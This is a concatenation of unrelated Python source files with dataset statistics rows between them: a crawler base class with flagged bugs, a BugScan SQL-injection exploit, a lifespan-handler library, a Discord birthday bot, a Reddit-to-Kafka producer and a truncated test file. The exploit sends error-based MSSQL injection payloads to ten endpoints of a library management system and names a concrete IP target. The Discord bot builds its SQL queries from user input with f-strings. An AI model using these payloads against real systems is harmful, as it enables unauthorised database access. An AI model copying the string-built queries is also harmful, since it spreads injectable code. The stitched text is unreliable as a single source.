from simplified_scrapy.core.sqlite_urlstore import SqliteUrlStore
from simplified_scrapy.core.sqlite_htmlstore import SqliteHtmlStore
from simplified_scrapy.core.obj_store import ObjStore
class Spider():
    """Base crawler: owns the URL/HTML/object stores, cookie handling,
    download throttling and the main save/extract hooks.

    Subclasses typically override `name`, `start_urls` and the extraction
    behaviour; the class attributes below act as per-spider configuration
    defaults.
    """
    name = None
    models = None
    concurrencyPer1s = 1  # max pages popped per second (see checkConcurrency)
    use_cookie = True
    use_ip = False  # global
    version = "0.0.1"
    request_timeout = None
    allowed_domains = []
    excepted_domains = []
    custom_down = False  # global
    useragent = None
    proxyips = None
    logged_in = False
    login_data = None
    refresh_urls = False
    stop = False
    encodings = {}
    request_tm = False
    save_html = True

    def __init__(self, name=None):
        # NOTE(review): any failure below is logged and swallowed, leaving a
        # partially-initialised spider — confirm this is intentional.
        try:
            if name is not None:
                self.name = name
            elif not getattr(self, 'name', None):
                raise ValueError("%s must have a name" % type(self).__name__)
            # Create the default SQLite-backed stores unless the subclass
            # already supplied its own.
            if not hasattr(self, 'start_urls'):
                self.start_urls = []
            if not hasattr(self, 'url_store'):
                self.url_store = SqliteUrlStore(self.name)
            if not hasattr(self, 'html_store'):
                self.html_store = SqliteHtmlStore(self.name)
            if not hasattr(self, "obj_store"):
                self.obj_store = ObjStore(self.name)
            if not hasattr(self, "cookie_store"):
                self.cookie_store = SqliteCookieStore()
            if not self.refresh_urls:
                self.url_store.saveUrl(self.start_urls, 0)
            else:
                self.url_store.resetUrls(self.start_urls)
            # Re-export the regex-helper functions as instance attributes so
            # subclasses can call e.g. self.listA(...).
            self.listA = listA
            self.listImg = listImg
            self.getElementsByTag = getElementsByTag
            self.getElementByID = getElementByID
            self.getElementsByClass = getElementsByClass
            self.getElementByTag = getElementByTag
            self.getElementByClass = getElementByClass
            self.getElement = getElement
            self.getElements = getElements
            self.getElementByAttr = getElementByAttr
            self.getParent = getParent
            self.getChildren = getChildren
            self.getNexts = getNexts
            self.getSection = getSection
            self.removeHtml = removeHtml
            self.trimHtml = trimHtml
            self.removeScripts = removeScripts
            self.tm = 0
            self.absoluteUrl = absoluteUrl
        except Exception as err:
            self.log(err, logging.ERROR)

    def log(self, msg, level=logging.DEBUG):
        # Echo to console and forward to the root logger at the given level.
        printInfo(msg)
        logger = logging.getLogger()
        logging.LoggerAdapter(logger, None).log(level, msg)

    def login(self, obj=None):
        # Perform the configured login request; falls back to self.login_data
        # when no explicit config is given.  Returns False when unconfigured.
        if (not obj): obj = self.login_data
        if (obj and obj.get('url')):
            data = obj.get('data')
            if (obj.get('method') == 'get'):
                return requestGet(obj.get('url'), obj.get('headers'),
                                  obj.get('useProxy'), self)
            else:
                return requestPost(obj.get('url'), data, obj.get('headers'),
                                   obj.get('useProxy'), self)
        else:
            return False

    def getCookie(self, url):
        # Cookie lookup is a no-op when cookies are disabled for this spider.
        if (self.use_cookie and self.cookie_store):
            return self.cookie_store.getCookie(url)
        return None

    def setCookie(self, url, cookie):
        if (self.use_cookie and self.cookie_store and cookie):
            self.cookie_store.setCookie(url, cookie)

    def beforeRequest(self, url, request, extra=None):
        # Attach the stored cookie (if any) before the request is sent.
        cookie = self.getCookie(url)
        if (cookie):
            # NOTE(review): both branches below are identical; the Python 2/3
            # split is presumably vestigial — candidate for simplification.
            if sys.version_info.major == 2:
                request.add_header('Cookie', cookie)
            else:
                request.add_header('Cookie', cookie)
        return request

    def afterResponse(self, response, url, error=False, extra=None):
        # Decode the response body and persist any Set-Cookie header.
        html = getResponseStr(response, url, self, error)
        if sys.version_info.major == 2:
            cookie = response.info().getheaders('Set-Cookie')
        else:
            cookie = response.info().get('Set-Cookie')
        self.setCookie(url, cookie)
        return html

    def renderUrl(self, url, callback):
        # Hook for JS-rendering subclasses; base class only warns.
        printInfo('Need to implement method "renderUrl"')

    def customDown(self, url):
        # Hook for custom downloaders (used when custom_down is True).
        printInfo('Need to implement method "customDown"')

    def popHtml(self, state=0):
        return self.html_store.popHtml(state)

    def saveHtml(self, url, html):
        # Either persist the raw HTML or extract immediately when persistence
        # is disabled.
        if (html):
            if self.save_html:
                self.html_store.saveHtml(url, html)
            else:
                # NOTE(review): `Dict` is not defined/imported in this module
                # — this branch would raise NameError; confirm intended type.
                return self.extract(Dict(url), html, None, None)

    def updateHtmlState(self, id, state):
        self.html_store.updateState(id, state)

    def downloadError(self, url, err=None):
        # Mark the URL as failed (state 2) so it is not retried immediately.
        printInfo('error url:', url, err)
        self.url_store.updateState(url, 2)

    def isPageUrl(self, url):
        # Heuristic: treat known page extensions as pages and known binary /
        # media extensions as non-pages; anything else defaults to True.
        if (not url):
            return False
        if ("html.htm.jsp.asp.php".find(url[-4:].lower()) >= 0):
            return True
        if ('.jpg.png.gif.bmp.rar.zip.pdf.doc.xls.ppt.exe.avi.mp4'.find(
                url[-4:].lower()) >= 0
                or '.jpeg.xlsx.pptx.docx'.find(url[-5:].lower()) >= 0
                or '.rm'.find(url[-3:].lower()) >= 0):
            return False
        return True

    def urlFilter(self, url):
        # Exclusion list wins over the allow list; with an allow list present
        # anything not matching it is rejected.
        if (self.excepted_domains):
            for d in self.excepted_domains:
                if (url.find(d) > -1): return False
        if (self.allowed_domains):
            for d in self.allowed_domains:
                if (url.find(d) > -1): return True
            return False
        return True

    def _urlFilter(self, urls):
        # Keep only the url dicts that pass urlFilter.
        tmp = []
        for url in urls:
            u = url['url']
            if u and self.urlFilter(u):
                tmp.append(url)
        return tmp

    def saveData(self, data):
        # Accepts a JSON string, a single dict, or a list of dicts; routes
        # "Urls" entries to the URL store and "Data" entries to the obj store.
        if (data):
            if (not isinstance(data, list) and not isinstance(data, dict)):
                objs = json.loads(data)
            elif isinstance(data, dict):
                objs = [data]
            else:
                objs = data
            for obj in objs:
                if (obj.get("Urls")):
                    self.saveUrl(obj.get("Urls"))
                ds = obj.get("Data")
                if (ds):
                    if isinstance(ds, list):
                        for d in ds:
                            self.saveObj(d)
                    else:
                        self.saveObj(ds)

    def saveObj(self, data):
        self.obj_store.saveObj(data)

    def extract(self, url, html, models, modelNames):
        # Delegate to the shared extractor; False signals "nothing to do".
        if (not modelNames):
            return False
        else:
            return extractHtml(url["url"], html, models, modelNames,
                               url.get("title"))

    # Throttling state: pages popped since _startCountTs (class-level
    # defaults; updated per instance).
    _downloadPageNum = 0
    _startCountTs = time.time()

    def checkConcurrency(self):
        # True when we are under the concurrencyPer1s budget; resets the
        # counting window as a side effect.
        tmSpan = time.time() - self._startCountTs
        if (self._downloadPageNum > (self.concurrencyPer1s * tmSpan)):
            return False
        self._startCountTs = time.time()
        self._downloadPageNum = 0
        return True

    def popUrl(self):
        # Returns the next URL dict, {} when throttled, or whatever the store
        # yields when empty.
        if (self.checkConcurrency()):
            url = self.url_store.popUrl()
            if url: self._downloadPageNum = self._downloadPageNum + 1
            return url
        else:
            return {}
        return None  # NOTE(review): unreachable

    def urlCount(self):
        return self.url_store.getCount()

    def saveUrl(self, urls):
        # Normalise the input (plain strings, href/src dicts) into
        # {'url': ...} dicts, filter by domain rules, then persist.
        if not urls: return
        if not isinstance(urls, list): urls = [urls]
        u = urls[0]
        if isinstance(u, str):
            if u.startswith('http'):
                urls = [{'url': url} for url in urls]
            else:
                logging.warn('Bad link data')
                return
        elif not u.get('url'):
            if u.get('href'):
                for url in urls:
                    url['url'] = url.get('href')
            elif u.get('src'):
                for url in urls:
                    url['url'] = url.get('src')
            else:
                logging.warn('Link data has no url attribute')
                return
        urls = self._urlFilter(urls)
        self.url_store.saveUrl(urls)

    def plan(self):
        # Override to return scheduled reset entries (see resetUrls).
        return []

    def clearUrl(self):
        self.url_store.clearUrl()

    def resetUrlsTest(self):
        self.url_store.resetUrls(self.start_urls)

    def resetUrls(self, plan):
        # Re-seed start_urls once per scheduled (hour, minute) entry; the last
        # reset time is persisted via Configs so restarts do not re-trigger.
        if (plan and len(plan) > 0):
            for p in plan:
                now = time.localtime()
                hour = now[3]
                minute = now[4]
                if (p.get('hour')):
                    hour = p.get('hour')
                if (p.get('minute')):
                    minute = p.get('minute')
                planTime = time.strptime(
                    u"{}-{}-{} {}:{}:00".format(now[0], now[1], now[2], hour,
                                                minute), "%Y-%m-%d %H:%M:%S")
                configKey = u"plan_{}".format(self.name)
                _lastResetTime = Configs().getValue(configKey)
                if (now > planTime
                        and (not _lastResetTime
                             or float(_lastResetTime) < time.mktime(planTime))):
                    self.url_store.resetUrls(self.start_urls)
                    Configs().setValue(configKey, float(time.mktime(planTime)))
                    return True
        return False
| 34.666667
| 102
| 0.542611
| 1,075
| 9,880
| 4.901395
| 0.227907
| 0.027899
| 0.025052
| 0.03644
| 0.171949
| 0.112355
| 0.079712
| 0.037199
| 0.015563
| 0
| 0
| 0.00593
| 0.351417
| 9,880
| 284
| 103
| 34.788732
| 0.816323
| 0.004251
| 0
| 0.160643
| 0
| 0.004016
| 0.050539
| 0.005288
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108434
| false
| 0
| 0.040161
| 0.012048
| 0.353414
| 0.02008
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c92fe0a2d25d872fa12d88c6134dd6759ab24310
| 1,457
|
py
|
Python
|
Bugscan_exploits-master/exp_list/exp-2469.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 11
|
2020-05-30T13:53:49.000Z
|
2021-03-17T03:20:59.000Z
|
Bugscan_exploits-master/exp_list/exp-2469.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-13T03:25:18.000Z
|
2020-07-21T06:24:16.000Z
|
Bugscan_exploits-master/exp_list/exp-2469.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-30T13:53:51.000Z
|
2020-12-01T21:44:26.000Z
|
#!/usr/bin/evn python
#--coding:utf-8--*--
#Name:天睿电子图书管理系统系统10处注入打包 避免重复
#Refer:http://www.wooyun.org/bugs/wooyun-2015-0120852/
#Author:xq17
def assign(service, arg):
    """Return (True, arg) when this exploit handles the given service."""
    return (True, arg) if service == "tianrui_lib" else None
def audit(arg):
    # Probe ten known-injectable endpoints plus one UPDATE-style variant; the
    # CHAR() payload concatenates the marker "WtFaBc" with @@version so a
    # vulnerable MSSQL backend echoes it in the error page.
    # (`curl` / `security_hole` are injected by the BugScan harness.)
    urls = [
        arg + 'gl_tj_0.asp?id=1',
        arg + 'gl_tuijian_1.asp',
        arg + 'gl_tz_she.asp?zt=1&id=1',
        arg + 'gl_us_shan.asp?id=1',
        arg + 'gl_xiu.asp?id=1',
        arg + 'mafen.asp?shuxing=1',
        arg + 'ping_cha.asp?mingcheng=1',
        arg + 'ping_hao.asp?mingcheng=1',
        arg + 'pl_add.asp?id=1',
        arg + 'search.asp?keywords=1&shuxing=1',
    ]
    for url in urls:
        url += '%20and%201=convert(int,CHAR(87)%2BCHAR(116)%2BCHAR(70)%2BCHAR(97)%2BCHAR(66)%2BCHAR(99)%2B@@version)'
        code, head, res, err, _ = curl.curl2(url)
        if((code == 200) or (code == 500)) and ('WtFaBcMicrosoft SQL Server' in res):
            security_hole("SQL Injection: " + url)
    url = arg + 'gl_tz_she.asp?zt=11%20WHERE%201=1%20AND%201=convert(int,CHAR(87)%2BCHAR(116)%2BCHAR(70)%2BCHAR(97)%2BCHAR(66)%2BCHAR(99)%2B@@version)--'
    code, head, res, err, _ = curl.curl2(url)
    if ((code == 200) or (code == 500)) and ('WtFaBcMicrosoft SQL Server' in res):
        security_hole("SQL Injection: " + url)
if __name__ == '__main__':
    # Standalone run: pull the BugScan harness stubs (curl, security_hole)
    # from `dummy` and audit the reference target.
    from dummy import *
    audit(assign('tianrui_lib','http://218.92.71.5:1085/trebook/')[1])
| 41.628571
| 154
| 0.587509
| 218
| 1,457
| 3.798165
| 0.454128
| 0.038647
| 0.036232
| 0.043478
| 0.490338
| 0.463768
| 0.427536
| 0.427536
| 0.427536
| 0.427536
| 0
| 0.099291
| 0.225806
| 1,457
| 35
| 155
| 41.628571
| 0.634752
| 0.091283
| 0
| 0.214286
| 0
| 0.071429
| 0.451788
| 0.262053
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.035714
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c933cadd6174b03b61565756a1609302c0c6bfc6
| 6,176
|
py
|
Python
|
moona/lifespan/handlers.py
|
katunilya/mona
|
8f44a9e06910466afbc9b2bcfb42144dcd25ed5a
|
[
"MIT"
] | 2
|
2022-03-26T15:27:31.000Z
|
2022-03-28T22:00:32.000Z
|
moona/lifespan/handlers.py
|
katunilya/mona
|
8f44a9e06910466afbc9b2bcfb42144dcd25ed5a
|
[
"MIT"
] | null | null | null |
moona/lifespan/handlers.py
|
katunilya/mona
|
8f44a9e06910466afbc9b2bcfb42144dcd25ed5a
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
from copy import deepcopy
from dataclasses import dataclass
from typing import Callable, TypeVar
from pymon import Future, Pipe, cmap, creducel, hof_2, this_async
from pymon.core import returns_future
from moona.lifespan import LifespanContext
# A lifespan pipeline step: takes the context and returns it (possibly
# modified), or None to short-circuit the rest of the pipeline.
LifespanFunc = Callable[[LifespanContext], Future[LifespanContext | None]]

# Internal shape of a handler: (next-step, context) -> resulting context.
_LifespanHandler = Callable[
    [LifespanFunc, LifespanContext], Future[LifespanContext | None]
]
def compose(h1: _LifespanHandler, h2: _LifespanHandler) -> LifespanHandler:
    """Compose 2 `LifespanHandler`s into one.

    Args:
        h1 (_LifespanHandler): to run first.
        h2 (_LifespanHandler): to run second.

    Returns:
        LifespanHandler: resulting handler.
    """

    def handler(
        final: LifespanFunc, ctx: LifespanContext
    ) -> Future[LifespanContext | None]:
        # Curry both handlers, then nest them so h1 wraps h2 wraps `final`.
        _h1 = hof_2(h1)
        _h2 = hof_2(h2)
        func = _h1(_h2(final))
        return func(ctx)

    return LifespanHandler(handler)
@dataclass(frozen=True, slots=True)
class LifespanHandler:
    """Abstraction over a function that handles `LifespanContext`."""

    # Wrapped handler callable; assigned through object.__setattr__ because
    # the dataclass is frozen.
    _handler: Callable[[LifespanContext], Future[LifespanContext | None]]

    def __call__(  # noqa
        self, nxt: LifespanFunc, ctx: LifespanContext
    ) -> Future[LifespanContext | None]:
        return returns_future(self._handler)(nxt, ctx)

    def __init__(self, handler: _LifespanHandler) -> None:
        object.__setattr__(self, "_handler", handler)

    def compose(self, h: _LifespanHandler) -> LifespanHandler:
        """Compose 2 `LifespanHandler`s into one.

        Args:
            h (_LifespanHandler): to run next.

        Returns:
            LifespanHandler: resulting handler.
        """
        return compose(self, h)

    def __rshift__(self, h: _LifespanHandler) -> LifespanHandler:
        # `h1 >> h2` is sugar for compose(h1, h2).
        return compose(self, h)
# Generic parameters for the curried handler1/2/3 decorators below.
A = TypeVar("A")
B = TypeVar("B")
C = TypeVar("C")
def handler(func: _LifespanHandler) -> LifespanHandler:
    """Decorator that converts function to LifespanHandler callable."""
    wrapped = LifespanHandler(func)
    return wrapped
def handle_func(func: LifespanFunc) -> LifespanHandler:
    """Converts `LifespanFunc` to `LifespanHandler`.

    Args:
        func (LifespanFunc): to convert to `LifespanHandler`.

    Returns:
        LifespanHandler: result.
    """

    @handler
    async def _handler(
        nxt: LifespanFunc, ctx: LifespanContext
    ) -> LifespanContext | None:
        # None short-circuits the pipeline; a context is passed on to `nxt`.
        match await func(ctx):
            case None:
                return None
            case LifespanContext() as _ctx:
                return await nxt(_ctx)

    return _handler
def handle_func_sync(
    func: Callable[[LifespanContext], LifespanContext | None]
) -> LifespanHandler:
    """Converts sync `LifespanFunc` to `LifespanHandler`.

    Args:
        func (Callable[[LifespanContext], LifespanContext | None]): to convert to
        `LifespanHandler`.

    Returns:
        LifespanHandler: result.
    """

    @handler
    async def _handler(
        nxt: LifespanFunc, ctx: LifespanContext
    ) -> LifespanContext | None:
        # Same contract as handle_func, but `func` is called without await.
        match func(ctx):
            case None:
                return None
            case LifespanContext() as _ctx:
                return await nxt(_ctx)

    return _handler
def __choose_reducer(f: LifespanFunc, s: LifespanFunc) -> LifespanFunc:
    # Fold step for choose(): try `f` on a deep copy of the context; if it
    # bails out (returns None), run `s` on the untouched original.
    @returns_future
    async def func(ctx: LifespanContext) -> LifespanFunc:
        _ctx = deepcopy(ctx)
        match await f(_ctx):
            case None:
                return await s(ctx)
            case some:
                return some

    return func
def choose(handlers: list[LifespanHandler]) -> LifespanHandler:
    """Iterate though handlers till one would return some `LifespanContext`.

    Args:
        handlers (list[LifespanHandler]): to iterate through.

    Returns:
        LifespanHandler: result.
    """

    @handler
    async def _handler(
        nxt: LifespanFunc, ctx: LifespanContext
    ) -> LifespanContext | None:
        match handlers:
            case []:
                # No candidates: fall straight through to the next step.
                return await nxt(ctx)
            case _:
                # Bind `nxt` into every handler, then fold them with
                # __choose_reducer so each candidate gets a fresh copy of the
                # context until one returns non-None.
                func: LifespanFunc = (
                    Pipe(handlers)
                    .then(cmap(hof_2))
                    .then(cmap(lambda h: h(nxt)))
                    .then(creducel(__choose_reducer))
                    .finish()
                )
                return await func(ctx)

    return _handler
def handler1(
    func: Callable[[A, LifespanFunc, LifespanContext], Future[LifespanContext | None]]
) -> Callable[[A], LifespanHandler]:
    """Decorator for LifespanHandlers with 1 additional argument.

    Makes it "curried".
    """

    def wrapper(a: A) -> LifespanHandler:
        def bound(
            nxt: LifespanFunc, ctx: LifespanContext
        ) -> Future[LifespanContext | None]:
            return func(a, nxt, ctx)

        return LifespanHandler(bound)

    return wrapper
def handler2(
    func: Callable[
        [A, B, LifespanFunc, LifespanContext], Future[LifespanContext | None]
    ]
) -> Callable[[A, B], LifespanHandler]:
    """Decorator for LifespanHandlers with 2 additional arguments.

    Makes it "curried".
    """

    def wrapper(a: A, b: B) -> LifespanHandler:
        def bound(
            nxt: LifespanFunc, ctx: LifespanContext
        ) -> Future[LifespanContext | None]:
            return func(a, b, nxt, ctx)

        return LifespanHandler(bound)

    return wrapper
def handler3(
    func: Callable[
        [A, B, C, LifespanFunc, LifespanContext], Future[LifespanContext | None]
    ]
) -> Callable[[A, B, C], LifespanHandler]:
    """Decorator for LifespanHandlers with 3 additional arguments.

    Makes it "curried".
    """

    def wrapper(a: A, b: B, c: C) -> LifespanHandler:
        def bound(
            nxt: LifespanFunc, ctx: LifespanContext
        ) -> Future[LifespanContext | None]:
            return func(a, b, c, nxt, ctx)

        return LifespanHandler(bound)

    return wrapper
def skip(_: LifespanContext) -> Future[None]:
    """`LifespanFunc` that skips pipeline by returning `None` instead of context.

    Args:
        _ (LifespanContext): ctx we don't care of.

    Returns:
        Future[None]: result.
    """
    return Future(this_async(None))
def end(ctx: LifespanContext) -> Future[LifespanContext]:
    """`LifespanFunc` that finishes the pipeline of request handling.

    Args:
        ctx (LifespanContext): to end.

    Returns:
        Future[LifespanContext]: ended ctx.
    """
    return Future(this_async(ctx))
| 25.841004
| 86
| 0.629858
| 614
| 6,176
| 6.21987
| 0.200326
| 0.064677
| 0.084839
| 0.083792
| 0.462425
| 0.350092
| 0.321288
| 0.305316
| 0.258968
| 0.188793
| 0
| 0.005095
| 0.269106
| 6,176
| 238
| 87
| 25.94958
| 0.840939
| 0.246438
| 0
| 0.284483
| 0
| 0
| 0.002505
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.163793
| false
| 0
| 0.060345
| 0.043103
| 0.465517
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9340f2d3c1db26d4655357d65aa1d342c92a30f
| 4,246
|
py
|
Python
|
bot/cogs/birthday/birthday.py
|
Qtopia-Team/luci
|
9b7f1966050910d50f04cbd9733d1c77ffbb8cba
|
[
"MIT"
] | 5
|
2021-04-27T10:50:54.000Z
|
2021-08-02T09:11:56.000Z
|
bot/cogs/birthday/birthday.py
|
Qtopia-Team/luci
|
9b7f1966050910d50f04cbd9733d1c77ffbb8cba
|
[
"MIT"
] | 2
|
2021-06-17T14:53:13.000Z
|
2021-06-19T02:14:36.000Z
|
bot/cogs/birthday/birthday.py
|
luciferchase/luci
|
91e30520cfc60177b9916d3f3d41678f590ecdfc
|
[
"MIT"
] | 4
|
2021-06-11T12:02:42.000Z
|
2021-06-30T16:56:46.000Z
|
import discord
from discord.ext import commands
import json
import os
import psycopg2
import pytz
class Birthday(commands.Cog):
"""Never forget birthday of your friends"""
def __init__(self):
# Set up database
DATABASE_URL = os.environ["DATABASE_URL"]
self.dbcon = psycopg2.connect(DATABASE_URL, sslmode = "require")
self.cursor = self.dbcon.cursor()
# Make a table if not already made
query = """CREATE TABLE IF NOT EXISTS bday(
id BIGINT NOT NULL PRIMARY KEY,
guild_id BIGINT NOT NULL,
bday_date INT NOT NULL,
bday_month INT NOT NULL,
tz TEXT NOT NULL
)"""
self.cursor.execute(query)
self.dbcon.commit()
@commands.guild_only()
@commands.group(invoke_without_command = True)
async def bday(self, ctx):
"""To set your bday type `luci bday set`
If you want to edit a bday type `luci bday edit`"""
pass
@bday.command(name = "set")
async def setbday(self, ctx, member: discord.Member, date, tz = "UTC"):
"""Usage: luci bday set @Lucifer Chase 27/02 kolkata
If you don't care about the timezone thing leave it blank"""
date = date.split("/")
for i in range(2):
if (date[i][0] == 0):
date[i] = date[i][1]
correct_date = True
if (date[0] > 31 or date[0] < 0 or date[1] > 12 or date[0] < 0):
correct_date = False
if (date[0] > 30 and date[1] not in [1, 3, 5, 7, 8, 10, 12]):
correct_date = False
elif (date[1] == 2 and date[0] > 27):
correct_date = False
if (not correct_date):
await ctx.send("Bruh! My expectation from you was low but holy shit!")
bday_date, bday_month = date
if (tz != "UTC"):
list_of_timezones = list(pytz.all_timezones)
for i in range(len(list_of_timezones)):
if (tz.title() in list_of_timezones[i]):
tz = list_of_timezones[i]
break
else:
await ctx.send("Uh oh! Timezone not found 👀")
await ctx.send("You can check list of timezones using `luci timezones [continent name]`")
return
try:
self.cursor.execute("DELETE FROM bday WHERE id = {}".format(member.id))
self.dbcon.commit()
except:
pass
query = f"""INSERT INTO bday VALUES
({member.id}, {member.guild.id}, {bday_date}, {bday_month}, '{tz}')"""
try:
self.cursor.execute(query)
self.dbcon.commit()
except Exception as error:
await ctx.send(f"```css\n{error}```")
await ctx.send(str("Are you doing everything correctly?" +
"Might want to check usage `luci help bday set`" +
"Or if the problem persists ping `@Lucifer Chase`"))
else:
embed = discord.Embed(title = "Success! <a:nacho:839499460874862655>", color = 0x00FFFF)
embed.add_field(name = "Member", value = member.nick)
embed.add_field(name = "Date", value = "/".join(date))
embed.add_field(name = "Timezone", value = tz)
await ctx.send(embed = embed)
@bday.command(name = "delete")
async def bdaydelete(self, ctx):
self.cursor.execute("DELETE FROM bday WHERE id = {}".format(ctx.author.id))
self.dbcon.commit()
@commands.command()
@commands.is_owner()
async def showbday(self, ctx):
self.cursor.execute("SELECT * FROM bday")
data = self.cursor.fetchall()
await ctx.send("```css\n{}```".format(json.dumps(data[len(data)//2:], indent = 1)))
await ctx.send("```css\n{}```".format(json.dumps(data[:len(data)//2], indent = 1)))
not_redundant = []
redundant = []
for i in data:
if (i[0] not in not_redundant):
not_redundant.append(i[0])
else:
redundant.append(i[0])
await ctx.send("```css\n{}```".format(json.dumps(redundant, indent = 2)))
| 35.090909
| 105
| 0.544277
| 539
| 4,246
| 4.218924
| 0.339518
| 0.031662
| 0.047493
| 0.022427
| 0.14248
| 0.128848
| 0.128848
| 0.096306
| 0.082674
| 0.043975
| 0
| 0.023558
| 0.330193
| 4,246
| 121
| 106
| 35.090909
| 0.775668
| 0.02049
| 0
| 0.177778
| 0
| 0.011111
| 0.230417
| 0.007121
| 0
| 0
| 0.002035
| 0
| 0
| 1
| 0.011111
| false
| 0.022222
| 0.066667
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9359b5500958801527c3395149655f6f66f2d7a
| 1,620
|
py
|
Python
|
ingestion/producer1.py
|
aspk/ratsadtarget
|
e93cd3f71000ec409e79e6e0c873578f0e8fa8b3
|
[
"Apache-2.0"
] | 1
|
2020-03-03T18:46:15.000Z
|
2020-03-03T18:46:15.000Z
|
ingestion/producer1.py
|
Keyology/ratsadtarget
|
e93cd3f71000ec409e79e6e0c873578f0e8fa8b3
|
[
"Apache-2.0"
] | null | null | null |
ingestion/producer1.py
|
Keyology/ratsadtarget
|
e93cd3f71000ec409e79e6e0c873578f0e8fa8b3
|
[
"Apache-2.0"
] | 1
|
2020-03-03T18:46:18.000Z
|
2020-03-03T18:46:18.000Z
|
# producer to stream data into kafka
from boto.s3.connection import S3Connection
import datetime
import json
import bz2
from kafka import KafkaProducer
from kafka.errors import KafkaError
import time
import pytz
# Source: a bz2-compressed month of reddit comments stored in S3.
conn = S3Connection()
key = conn.get_bucket('aspk-reddit-posts').get_key('comments/RC_2017-11.bz2')

# Sink: Kafka broker on the ingestion host.
producer = KafkaProducer(bootstrap_servers=['10.0.0.5:9092'])

count = 0
decomp = bz2.BZ2Decompressor()
CHUNK_SIZE = 5000 * 1024  # ~5 MB of compressed data per S3 read
start_time = time.time()

while True:
    print('in')
    chunk = key.read(CHUNK_SIZE)
    if not chunk:
        break
    data = decomp.decompress(chunk).decode()
    # NOTE(review): a JSON record can straddle a chunk boundary; such partial
    # lines are skipped below rather than stitched together — confirm that
    # loss is acceptable for this pipeline.
    for line in data.split('\n'):
        try:
            count += 1
            # count starts at 1, so the original `and count != 0` was redundant.
            if count % 10000 == 0:
                print('rate of kafka producer messages is {}'.format(count/(time.time()-start_time)))
            comment = json.loads(line)
            reddit_event = {}
            reddit_event['post'] = comment['permalink'].split('/')[-3]
            reddit_event['subreddit'] = comment['subreddit']
            reddit_event['timestamp'] = str(datetime.datetime.fromtimestamp(time.time()))
            reddit_event['body'] = comment['body']
            reddit_event['author'] = comment['author']
            producer.send('reddit-stream-topic', bytes(json.dumps(reddit_event),'utf-8'))
            producer.flush()
            # to reduce speed use time.sleep(0.01)
            #time.sleep(0.001)
        except (ValueError, KeyError, IndexError):
            # Narrowed from a bare `except:` (which also swallowed
            # KeyboardInterrupt/SystemExit): only malformed or partial
            # records are expected here.
            print('Incomplete string ... skipping this comment')
| 33.061224
| 105
| 0.608642
| 193
| 1,620
| 5.025907
| 0.528497
| 0.079381
| 0.020619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.040235
| 0.26358
| 1,620
| 48
| 106
| 33.75
| 0.772842
| 0.057407
| 0
| 0
| 0
| 0
| 0.158344
| 0.015112
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.210526
| 0
| 0.210526
| 0.078947
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9380c3f618a01051fb6b644e3bcd12fce9edfdc
| 7,931
|
py
|
Python
|
tests/test_data/test_data_core.py
|
shaoeric/hyperparameter_hunter
|
3709d5e97dd23efa0df1b79982ae029789e1af57
|
[
"MIT"
] | 688
|
2018-06-01T23:43:28.000Z
|
2022-03-23T06:37:20.000Z
|
tests/test_data/test_data_core.py
|
shaoeric/hyperparameter_hunter
|
3709d5e97dd23efa0df1b79982ae029789e1af57
|
[
"MIT"
] | 188
|
2018-07-09T23:22:31.000Z
|
2021-04-01T07:43:46.000Z
|
tests/test_data/test_data_core.py
|
shaoeric/hyperparameter_hunter
|
3709d5e97dd23efa0df1b79982ae029789e1af57
|
[
"MIT"
] | 100
|
2018-08-28T03:30:47.000Z
|
2022-01-25T04:37:11.000Z
|
##################################################
# Import Own Assets
##################################################
from hyperparameter_hunter.data.data_core import BaseDataChunk, BaseDataset, NullDataChunk
##################################################
# Import Miscellaneous Assets
##################################################
import pandas as pd
import pytest
from unittest import mock
##################################################
# White-Box/Structural Test Fixtures
##################################################
@pytest.fixture(scope="module")
def null_chunk_fixture():
    """Module-scoped `data.data_core.NullDataChunk` shared by structural tests."""
    chunk = NullDataChunk()
    return chunk
@pytest.fixture(scope="module")
def base_dataset_fixture():
    """Module-scoped `data.data_core.BaseDataset` (built with null args)."""
    dataset = BaseDataset(None, None)
    return dataset
##################################################
# White-Box/Structural Tests
##################################################
@mock.patch("hyperparameter_hunter.data.data_core.NullDataChunk._on_call_default")
@pytest.mark.parametrize("point", ["start", "end"])
